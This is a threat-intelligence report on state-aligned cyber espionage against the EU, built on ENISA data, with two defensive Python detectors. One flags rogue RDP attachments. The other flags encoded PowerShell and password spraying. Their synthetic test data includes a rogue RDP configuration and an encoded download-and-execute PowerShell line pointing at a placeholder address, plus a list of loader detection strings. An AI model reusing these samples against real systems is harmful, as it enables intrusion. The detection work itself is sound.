State-Aligned Cyber Threats Targeting the European Union: An ENISA Threat Landscape Analysis


1.0 The Evolving Landscape of State-Aligned Threats

Understanding the cyber activities of state-aligned threat actors is indispensable for safeguarding the European Union's security, economic stability, and sovereignty in the digital age. These adversaries conduct sophisticated, persistent campaigns that represent a strategic threat to the EU's public institutions and critical infrastructure. This report analyzes the landscape of these state-aligned threats based on data from the ENISA Threat Landscape report, covering incidents documented between July 2024 and June 2025, to provide actionable intelligence for EU policymakers and defenders.

The reporting period underscores the targeted and impactful nature of state-aligned operations. While constituting a fraction of total incident volume, their potential for strategic disruption remains a primary concern for the Union. Key statistics from the analysis reveal a concentrated threat:

  • 7.2% of total incidents recorded were identified as cyberespionage campaigns, the primary objective of state-aligned activities.
  • 46 distinct state-aligned intrusion sets were observed to be active against targets within the European Union.
  • The top five targeted NIS2 sectors were public administration, transport, digital infrastructure, energy, and health, demonstrating a clear focus on sectors vital to national and EU-level functioning.

A persistent challenge in countering these threats is the difficulty of definitive attribution. The ENISA report notes that "cyberespionage campaigns are typically documented with a delay spanning from 6 months to more than 4 years," so defenders work from a historical and incomplete picture of the threat. The picture is further blurred by a significant attribution gap: intrusion sets that could not be named account for 47% of Russia-nexus, 43% of China-nexus, and 36% of DPRK-nexus activity. Both factors hinder precise situational awareness and complicate the design of tailored defensive strategies.

This report will now transition to a detailed analysis of the primary threat actor nexuses most actively targeting the European Union.

2.0 Primary Threat Actors: Analysis by Nexus

This section provides a strategic breakdown of the most active state-aligned adversaries targeting the European Union, categorized by geopolitical nexus. This analysis covers their primary targets, operational focus, and notable campaigns observed during the July 2024 to June 2025 reporting period, interpreting their activities through a geopolitical lens.

2.1 Russia-Nexus Adversaries

Intrusion sets aligned with Russia were the most active state-aligned threat actors targeting the EU, conducting sustained cyberespionage campaigns designed to undermine European security and support Moscow's strategic objectives. The most frequently documented groups were APT29, APT28, and Sandworm. Their targeting patterns indicate a concerted intelligence effort to map and disrupt NATO's logistical supply lines to Ukraine and to gauge the political resolve of key Member States like Germany and France.

Russia-Nexus Targeting Focus in the EU

  • Targeted EU Member States: Poland, France, Germany, Belgium, Greece
  • Targeted Sectors: Public Administration (Governmental & Diplomatic), Defence, Digital Infrastructure, Transport

Key campaigns observed during this period highlight the diverse and persistent nature of their activities:

  • APT28 conducted widespread spearphishing campaigns with a clear focus on transport, defence, logistics, and political entities to gather intelligence on military logistics and political decision-making.
  • APT29 executed a global spearphishing campaign that delivered rogue RDP configuration files, which open an outbound Remote Desktop session to an attacker-controlled server with the victim's local resources redirected to it, and resumed its well-known "wine tasting event" lure, impersonating EU Member State embassies to target Ministries of Foreign Affairs.
  • Sandworm, known for its disruptive capabilities, maintained an operational mandate focused on the energy sector, illustrated by its targeting of a gas storage entity in an EU Member State.
  • Turla conducted a long-standing cyberespionage campaign narrowly focused on governmental entities within a specific EU Member State, signaling a deep and persistent intelligence requirement.
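The rogue RDP file technique used by APT29 is easy to miss because the attachment is a plain-text configuration file rather than an executable. As an added illustration (example code written for this page, not from the ENISA report or any vendor tooling), the following Python triage script parses a .rdp attachment and flags the resource-redirection settings that hand a victim's drives, clipboard, printers, smart cards and WebAuthn devices to the remote host. The property names are the standard mstsc .rdp settings; the two sample files, the hostnames in them and the trusted-host list are constructed.

```python
"""Triage .rdp email attachments for the resource-redirection settings abused
by rogue-RDP phishing. Added example, not from the ENISA report; the sample
files and hostnames below are constructed."""
from dataclasses import dataclass
import re

# Standard mstsc .rdp properties that expose local resources to the remote host.
# Type "i" is on when the value is 1; type "s" is on when non-empty ("*" = all).
REDIRECT_SETTINGS = {
    "drivestoredirect": "s",
    "devicestoredirect": "s",
    "redirectclipboard": "i",
    "redirectprinters": "i",
    "redirectsmartcards": "i",
    "redirectcomports": "i",
    "redirectwebauthn": "i",
}
# Drive and device redirection expose the whole filesystem; treat them as blocking.
HIGH_RISK = {"drivestoredirect", "devicestoredirect"}

LINE_RE = re.compile(r"^(?P<key>[^:]+):(?P<type>[sib]):(?P<value>.*)$")


def parse_rdp(text):
    """Return {key: (type, value)} for every well-formed 'key:type:value' line."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        m = LINE_RE.match(line)
        if m:
            settings[m.group("key").strip().lower()] = (m.group("type"), m.group("value").strip())
    return settings


def remote_host(settings):
    """Hostname from 'full address:s:host[:port]' (DNS/IPv4 form), lower-cased."""
    _, addr = settings.get("full address", ("s", ""))
    host, sep, port = addr.rpartition(":")
    return (host if sep and port.isdigit() else addr).lower()


@dataclass
class RdpAssessment:
    host: str
    redirections: list
    remote_app: bool
    signed: bool
    verdict: str  # "allow", "review" or "block"


def assess_rdp(text, trusted_hosts=()):
    """Flag .rdp files that would connect an untrusted host to local resources."""
    s = parse_rdp(text)
    host = remote_host(s)
    redirections = []
    for key, typ in REDIRECT_SETTINGS.items():
        if key not in s:
            continue
        value = s[key][1]
        if (typ == "i" and value == "1") or (typ == "s" and value):
            redirections.append(key)
    remote_app = s.get("remoteapplicationmode", ("i", "0"))[1] == "1"
    signed = "signature" in s  # a signed file suppresses some mstsc warnings
    if host in {h.lower() for h in trusted_hosts}:
        verdict = "allow"
    elif HIGH_RISK & set(redirections):
        verdict = "block"
    else:
        verdict = "review"  # unknown host: still a credential/phishing risk
    return RdpAssessment(host, redirections, remote_app, signed, verdict)


# Constructed sample resembling a rogue-RDP lure: every local resource is
# redirected to an attacker-controlled host and the file carries a signature.
ROGUE_RDP = """\
screen mode id:i:2
full address:s:rdp.example.invalid:3389
remoteapplicationmode:i:1
remoteapplicationname:s:Connection Stability Test
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:1
redirectsmartcards:i:1
redirectcomports:i:1
redirectwebauthn:i:1
signscope:s:Full Address,RemoteApplicationMode
signature:s:AQABAAEAAAA=
"""

# Constructed benign file pointing at a known internal terminal server.
INTERNAL_RDP = """\
full address:s:TS01.corp.example:3389
redirectclipboard:i:1
drivestoredirect:s:
"""

if __name__ == "__main__":
    for name, text in (("rogue", ROGUE_RDP), ("internal", INTERNAL_RDP)):
        print(name, assess_rdp(text, trusted_hosts=["ts01.corp.example"]))
```

The verdict logic is deliberately conservative: any .rdp file whose target is not an allow-listed terminal server gets at least a review, and drive or device redirection to an unknown host is blocked outright. In practice the same check belongs at the mail gateway, complemented by a Windows policy that disables drive and clipboard redirection for outbound RDP.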

2.2 China-Nexus Adversaries

China-nexus intrusion sets executed a consistent operational mission to acquire strategic data and intellectual property. This demonstrates a systematic, state-directed campaign of industrial espionage designed to close China's technological gap and erode the EU's competitive advantage in key high-tech sectors. The top five most active groups were UNC5221, Mustang Panda, APT41, Flax Typhoon, and Salt Typhoon.

These groups primarily targeted entities in Italy, Germany, France, and Belgium, with a sectoral focus on public administration, transport, civil society, and digital infrastructure. An emerging interest in food manufacturing and agricultural research was also observed. This targeting aligns with Beijing's major policy initiatives, such as the "Made in China 2025" plan and the "Belt and Road" initiative, by collecting sensitive data on technology, trade infrastructure, and EU policy.

A key tactic is the leveraging of compromised edge devices, such as routers and VPN appliances, which are incorporated into vast Operational Relay Box (ORB) networks to obfuscate origins and facilitate follow-on attacks. Campaigns by UNC5221 and Flax Typhoon exemplified this technique, compromising telecommunications providers, manufacturers, and public administration entities across the EU.

2.3 DPRK-Nexus Adversaries

DPRK-nexus intrusion sets pursued a dual mission of cyberespionage and illicit revenue generation to fund the regime. The most active groups targeting the EU were Famous Chollima, Lazarus, and Kimsuky. Their campaigns focused on Belgium, Italy, Germany, and France, with a heavy emphasis on private sector organizations in the Human Resources, financial services (including cryptocurrency), and technology sectors.

A prevalent tactic is the fraudulent IT worker employment scheme, primarily attributed to Famous Chollima. DPRK-nexus operators pose as skilled remote IT professionals, often behind stolen or fabricated identities, to gain employment within target companies. The scheme serves two objectives: enabling cyberespionage through the legitimate network access a contractor is granted, and generating revenue, first through salaries and then, once the contract is terminated, through extortion using data taken during the engagement.

2.4 Other State-Aligned Actors of Concern

Beyond the primary nexuses, other state-aligned actors and Private Sector Offensive Actors (PSOAs) targeted EU interests.

  • India-Nexus: Groups such as Bitter and SideWinder conducted spearphishing campaigns against EU embassies during the reporting period. Their lures, referencing EU-India trade and security dialogues, reflect a strategic interest in EU foreign policy.
  • Iran-Nexus: Groups such as MuddyWater and Charming Kitten conducted low-tempo but highly focused operations against civil society, NGOs, and the Iranian diaspora, aligning with Tehran's objective of monitoring and suppressing dissident activity abroad.
  • Other State Actors: Belarus-linked Ghostwriter continued its targeted spearphishing campaigns against Poland, representing a persistent threat from a neighboring state. In parallel, spillover threats from the Middle East conflict materialized through pro-Houthi intrusion sets OilAlpha and Rare Werewolf, impacting EU entities.
  • Private Sector Offensive Actors (PSOAs): The abuse of sophisticated commercial spyware from Candiru, NSO Group (Pegasus), and Paragon Solutions (Graphite) remains a significant threat. Victims within the EU included Members of the European Parliament (MEPs), government officials, and professionals in various sectors. The proliferation of this commercial spyware market presents a unique challenge, effectively democratizing state-level surveillance capabilities and creating a deniable vector for foreign states to target EU officials, thereby undermining diplomatic confidentiality and political sovereignty.

The effectiveness of these diverse actors relies on an evolving set of tactics, techniques, and procedures.

3.0 Analysis of State-Aligned Tactics, Techniques, and Procedures (TTPs)

Adversary tradecraft is not static; it is a constantly evolving response to our defenses. Analyzing their Tactics, Techniques, and Procedures (TTPs) allows us to move from a reactive posture to a predictive one, anticipating their next move. This section details the common and innovative techniques leveraged by state-aligned groups against EU targets.

Across all intrusion sets, a core set of TTPs remains consistently popular for gaining initial access and executing payloads:

  • Spearphishing: Highly targeted emails remain a primary vector for initial compromise.
  • Exploitation of public-facing services: Adversaries frequently scan for and exploit vulnerabilities in internet-facing applications.
  • Execution via PowerShell: The use of PowerShell for command execution is a common post-compromise technique.
  • Credential brute-forcing and USB-based attacks are also frequently observed.
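Two of these techniques, PowerShell execution and credential brute-forcing, leave evidence in standard Windows Security logs, and the detections are simple enough to show end to end. The following Python is an added example written for this page (not from the ENISA report or any vendor product): it decodes the script hidden behind an -EncodedCommand argument in process-creation (4688) events and checks it for download-and-execute indicators, and it counts logon failures (4625) per source address in a sliding window to surface password guessing. All events, hostnames and addresses are constructed.

```python
"""Two detections over constructed Windows Security events: PowerShell started
with an encoded command (decoded and inspected for download-and-execute
patterns) and password-guessing bursts (many 4625 logon failures from one
source). Added example; every event below is synthetic."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Substrings that commonly appear in download-and-execute or in-memory loaders.
SUSPICIOUS_PATTERNS = ("Invoke-Expression", "IEX", "DownloadString", "FromBase64String",
                       "Net.WebClient", "Invoke-WebRequest", "-bxor", "Reflection.Assembly")


def decode_encoded_command(cmdline):
    """Return the script passed via -EncodedCommand (PowerShell also accepts
    abbreviated forms such as -e, -ec and -enc), or None if there is none."""
    for m in re.finditer(r"-(e\w*)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE):
        if "encodedcommand".startswith(m.group(1).lower()):
            try:
                # PowerShell encodes the script as UTF-16LE before base64.
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def detect_encoded_powershell(events):
    """Flag 4688 process-creation events where PowerShell runs an encoded script."""
    findings = []
    for e in events:
        cmd = e.get("CommandLine", "")
        if e["EventID"] != 4688 or not re.search(r"(?i)\b(powershell|pwsh)(\.exe)?", cmd):
            continue
        script = decode_encoded_command(cmd)
        if script is None:
            continue
        indicators = [p for p in SUSPICIOUS_PATTERNS if p.lower() in script.lower()]
        findings.append({"computer": e["Computer"], "user": e["SubjectUserName"],
                         "script": script, "indicators": indicators})
    return findings


def detect_password_guessing(events, threshold=10, window=timedelta(minutes=5)):
    """Return {source_ip: (max failures inside one window, sorted target accounts)}
    for sources with at least `threshold` 4625 failures within `window`."""
    by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            by_ip[e["IpAddress"]].append((e["TimeCreated"], e["TargetUserName"]))
    hits = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        start, best = 0, 0
        for end, (t, _) in enumerate(attempts):
            while t - attempts[start][0] > window:  # slide the window forward
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits[ip] = (best, sorted({u for _, u in attempts}))
    return hits


# --- constructed sample events (RFC 5737 documentation addresses) ---
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
T0 = datetime(2025, 3, 4, 9, 0, 0)
EVENTS = [
    {"EventID": 4688, "Computer": "WS-042", "SubjectUserName": "j.doe", "TimeCreated": T0,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"EventID": 4688, "Computer": "WS-042", "SubjectUserName": "j.doe",
     "TimeCreated": T0 + timedelta(minutes=1),
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    # two failures from a workstation: a user mistyping a password
    {"EventID": 4625, "IpAddress": "10.0.0.5", "TargetUserName": "a.smith",
     "TimeCreated": T0 + timedelta(minutes=2)},
    {"EventID": 4625, "IpAddress": "10.0.0.5", "TargetUserName": "a.smith",
     "TimeCreated": T0 + timedelta(minutes=3)},
]
# twelve failures in under two minutes, each against a different account: a spray
EVENTS += [{"EventID": 4625, "IpAddress": "198.51.100.7", "TargetUserName": f"user{i:02d}",
            "TimeCreated": T0 + timedelta(seconds=10 * i)} for i in range(12)]

if __name__ == "__main__":
    for f in detect_encoded_powershell(EVENTS):
        print(f"{f['computer']}/{f['user']}: {f['indicators']} <- {f['script']}")
    for ip, (count, users) in detect_password_guessing(EVENTS).items():
        print(f"{ip}: {count} failures against {users}")
```

Note that the benign `-ExecutionPolicy Bypass -File` invocation is not flagged: the decoder only accepts flags that are prefixes of EncodedCommand. Threshold and window are tuning knobs; a spray that rotates accounts slowly will need a longer window or a per-account rather than per-source view.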

3.1 Evolving Toolsets and Advanced Techniques

Beyond these common methods, state-aligned actors demonstrated significant innovation to overcome modern defenses.

  • Innovative Access Vectors: Adversaries are developing novel ways to breach secure environments. Notable examples include APT28's nearest-neighbour Wi-Fi attack, which enables network compromise from adjacent physical locations, and GoldenJackal's infiltration of air-gapped systems.
  • Infrastructure Exploitation: A key trend is the compromise of core network devices to gain deep, persistent access. UNC3886 was observed targeting Juniper routers, while Velvet Ant exploited Cisco NX-OS zero-day vulnerabilities, demonstrating a focus on foundational network infrastructure.
  • Programming Language Shifts: To evade signature-based detection tuned to their older tooling, groups are re-implementing toolsets in less common languages. Both GoldenJackal and APT35 (Charming Kitten, with its Cyclops backdoor) have moved key tools to Go.
  • Evasion and Stealth: Advanced anti-detection mechanisms are being integrated into malware, including sandbox detection and the abuse of legitimate, signed software to conceal malicious activity.
  • Expanded Linux Targeting: Adversaries have developed malware specifically for Linux, a growing target in cloud environments. Families such as WolfsBane, FireWood, and POOLRAT are designed for these systems.
  • In-Memory Deployment: To minimize their forensic footprint, adversaries are increasingly using in-memory payloads that are never written to disk. This technique was observed in campaigns by BackdoorDiplomacy and with APT29's GRAPELOADER malware.

These technical TTPs are deployed within broader strategic patterns that define how adversaries interact with and exploit the EU's unique geopolitical landscape.

4.0 Strategic Operational Patterns

Beyond specific technical procedures, state-aligned actors exhibit broader strategic patterns in their operations against the European Union. These patterns reveal how adversaries perceive and exploit the EU's political, digital, and geographical environment to their advantage.

4.1 The EU as Both Target and Lure

Threat actors frequently impersonate EU institutions, officials, and events to enhance the credibility of their social engineering campaigns. By leveraging the authority associated with the EU brand, adversaries significantly increase the likelihood that targets will engage with malicious content. This tactic was observed across multiple campaigns:

  • APT29 crafted spearphishing emails that impersonated an EU Ministry of Foreign Affairs and referenced fictitious diplomatic events.
  • Callisto developed highly tailored phishing pages designed to mimic official EU institutional correspondence.
  • Kimsuky used EU-branded diplomatic meeting invitations containing malicious macros as a lure.

4.2 Exploitation of EU-Based Infrastructure

Adversaries routinely compromise and leverage EU-based servers and devices to obfuscate their origins and stage follow-on attacks. Because much of this infrastructure is shared with or rented from the cybercrime ecosystem, the practice blurs the line between state-aligned and criminal activity and complicates attribution. China-nexus groups made extensive use of Operational Relay Box (ORB) networks incorporating compromised devices across the EU; the Russia-nexus group Turla configured its backdoor to use compromised WordPress installations hosted within the EU for command and control; and APT29 and Sandworm were observed routing traffic through commercial proxy networks also used by cybercriminals.

4.3 Complex Targeting Geographies

State-aligned actors adopt complex targeting strategies that exploit the EU's global presence and its status as an international hub. Two distinct patterns were observed:

  1. Attacks on EU entities located outside EU territory: Adversaries target the EU's diplomatic missions and commercial operations in third countries, which may operate in more permissive security environments. Campaigns by APT29 against EU diplomatic missions abroad exemplify this approach.
  2. Attacks on non-EU entities operating within EU territory: Threat actors target foreign diplomatic missions and international organizations based within the EU. Charming Kitten leveraged journalist personas to approach Middle Eastern embassy staff in European capitals, while MirrorFace was observed targeting entities within the EU, likely as a vector to reach its primary Japanese targets.

These strategic patterns demonstrate a sophisticated understanding of the EU's operational environment, allowing adversaries to exploit trust, geography, and infrastructure to achieve their intelligence objectives.

5.0 Conclusion: Key Findings and Strategic Implications

This analysis confirms that state-aligned cyber activities are a high-impact, persistent threat to the European Union. While Russia-nexus groups remain the most active, adversaries from China, the DPRK, and other nexuses conduct continuous cyberespionage campaigns targeting the EU’s critical sectors and public institutions. These actors demonstrate growing sophistication, exploiting EU infrastructure and strategically weaponizing the EU's own brand as a social engineering lure. State-aligned cyberespionage is an enduring strategic challenge that directly threatens the Union's political and economic interests.

The findings presented in this report carry several key strategic implications for the European Union's cybersecurity policy and defensive posture:

  • The EU Brand is a Strategic Asset and an Attack Vector: Adversaries consistently weaponize the EU's identity to enhance their social engineering campaigns. This necessitates a proactive strategy to defend the EU's brand, including robust digital identity verification for official communications and targeted education for personnel at high risk of impersonation attacks.
  • The EU's Global Footprint is a Distributed Attack Surface: The Union's expansive diplomatic and economic presence constitutes a distributed and often softer target for adversaries. Securing the EU's digital domain requires extending robust cybersecurity postures to its global outposts, treating them as forward-deployed sensors and potential entry points into core networks.
  • Adversary Use of EU Infrastructure Erodes Digital Trust: The compromise of EU-based servers by foreign adversaries complicates attribution, undermines trust in the regional digital ecosystem, and allows attackers to stage operations from within the Union's borders. Securing this infrastructure is critical not only for direct defense but also to prevent the EU from being used as a launchpad for malicious activities worldwide.
